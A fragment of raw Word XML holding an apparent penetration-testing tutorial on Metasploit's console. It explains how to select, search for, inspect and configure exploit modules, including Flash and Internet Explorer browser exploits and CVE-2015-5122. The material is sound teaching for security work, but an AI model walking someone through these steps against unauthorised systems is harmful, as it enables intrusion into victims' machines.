    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>msfconsole:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13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line="252" w:lineRule="auto" w:before="212"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
        <w:jc w:val="both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changed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line’s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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>called</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>realvnc_client</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Then,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>retrieve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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about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exploit,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>parameters,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run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against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target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="388" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If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want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leave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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>back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msfconsole,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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back</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>back </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>command will take us back to the msfconsole in the general context. You can issue the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>again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switch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another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="483"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command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close the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>msfconsole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will take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Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>terminal.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51" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250003" w:id="5"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="385"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>help </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command will return a list of possible commands and a description when typed at the msfconsole.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>When an active exploit is selected, you can use the help command to get a list of exploit commands. An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>example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presented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Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.2.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1" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250002" w:id="6"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="387"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When an exploit is selected with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>use </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command, you can retrieve information like the name, platform,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>author,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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targets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info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command.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CS-CNS-20010.3,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46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>named</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ie_execcommand_uaf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>: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1" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250001" w:id="7"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="22"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="387"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Metasploit contains over 1.500 different exploits, and new ones are added regularly. With this number of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploits, the search function and knowing how to use it becomes very important. The easiest way of using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search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>function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issuing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>
          <w:i/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="3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term,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flash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search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for exploits related to Flash player. As shown in Figure CS-CNS-20010.4, by using the search command,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Metasploit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search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given</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>term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module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>names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description.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expected,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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:jc w:val="both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2057"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3665410" cy="1426940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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410" cy="14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9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="143"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="47"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>CS-CNS-20010.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>msfconsole:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13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rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="252" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="185" w:right="389" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>lot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exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>related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often</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>player</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>software.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example,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includes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CVE-2015-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-46"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5122 Adobe Flash opaqueBackground Use After Free zero-day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, which was discovered in the Hacking Team data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>breach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="185" w:right="386" w:firstLine="298"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You can use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>search </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command with a keyword to search for a specific author, an OSVDB ID, or a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>platform.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presented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>example,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="25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keyword.</w:t>
      </w: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562"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250000" w:id="8"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Commands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18"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Exploits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="127"/>
        <w:ind w:left="185" w:right="387"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Now,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looking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show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exploit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change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command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>also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looking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how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show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payloads,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>targets,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>advanced,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evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>options.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1" w:after="0"/>
        <w:ind w:left="885" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="252" w:lineRule="auto" w:before="131"/>
        <w:ind w:left="185" w:right="386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>
          <w:i/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>options </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>command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exploit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command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>line is in exploit context. Let’s use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>adobe_flash_shader_drawing_fill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>exploit and have a look at the options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following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9474" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="15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msf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:spacing w:val="-7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&gt;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Use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exploit/multi/browser/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adobe_flash_shader_drawing_fill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69"/>
        <w:ind w:left="484"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Followed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i/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>command,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output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presented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5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CS-CNS-20010.5:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="9474" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="166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msf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&gt;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show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options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69"/>
        <w:ind w:left="484"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploit contains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total of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options from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only 2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required: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207" w:after="0"/>
        <w:ind w:left="897" w:right="0" w:hanging="458"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Retries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88" w:after="0"/>
        <w:ind w:left="897" w:right="0" w:hanging="458"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SRVHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(Required)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87" w:after="0"/>
        <w:ind w:left="897" w:right="0" w:hanging="458"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SRVPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(Required)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87" w:after="0"/>
        <w:ind w:left="897" w:right="0" w:hanging="458"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SSL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88" w:after="0"/>
        <w:ind w:left="897" w:right="0" w:hanging="458"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SSLCert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="896" w:val="left" w:leader="none"/>
          <w:tab w:pos="898" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="87" w:after="0"/>
        <w:ind w:left="897" w:right="0" w:hanging="458"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URLPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="211"/>
        <w:ind w:left="484"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Note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show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command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returning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currently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>below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module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>options.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="185"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
